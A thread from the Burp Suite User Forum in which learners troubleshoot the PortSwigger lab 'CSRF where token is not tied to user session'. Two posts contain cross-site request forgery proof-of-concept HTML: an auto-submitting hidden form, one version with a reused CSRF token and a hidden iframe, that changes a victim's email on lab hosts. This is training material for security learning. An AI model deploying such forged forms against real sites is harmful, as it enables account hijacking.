The Burp Suite User Forum was discontinued on the 1st November 2024.

Burp Suite User Forum

Lab: CSRF where token is not tied to user session

Kristoffer | Last updated: Jul 27, 2020 02:42PM UTC

I've been doing this lab, and I've almost made it. However, when making the PoC it won't get resolved. It looks like this:

    <form method="POST" action="https://acb41f1f1e3c69e3807775f800700074.web-security-academy.net/email/change-email">
      <input type="hidden" name="email" value="noen@email.com">
    </form>
    <script>
      document.forms[0].submit();
    </script>

I've made sure to use a CSRF token that is not used in the session from "incognito" and then copied the URL from "repeater". But it won't get resolved. Please give me some help :)

Uthman, PortSwigger Agent | Last updated: Jul 27, 2020 02:47PM UTC

Hi Kristoffer, You will need to include information about the CSRF token within the HTML. You can take a look at this video for a full example: - https://www.youtube.com/watch?v=JKwTX9wjeec

Elliot | Last updated: May 15, 2024 07:08PM UTC

I've been doing this lab too... This is what I did:

    <html>
      <body>
        <h1>Hello World!</h1>
        <iframe style="display: none" name="csrf-iframe"></iframe>
        <form method="post" action="https://0a1d004c0417d4e283b7472a00530060.web-security-academy.net/my-account/change-email" id="csrf-form" target="csrf-iframe">
          <input type="hidden" name="email" value="test5@test.ca">
          <input type="hidden" name="csrf" value="C3BUSogr6GeJhmKkTxoaaXMbCSkGq7cA">
        </form>
        <script>document.getElementById("csrf-form").submit()</script>
      </body>
    </html>

But I don't know where my error is? I use Community Edition. Thanks in advance!

Dominyque, PortSwigger Agent | Last updated: May 16, 2024 01:23PM UTC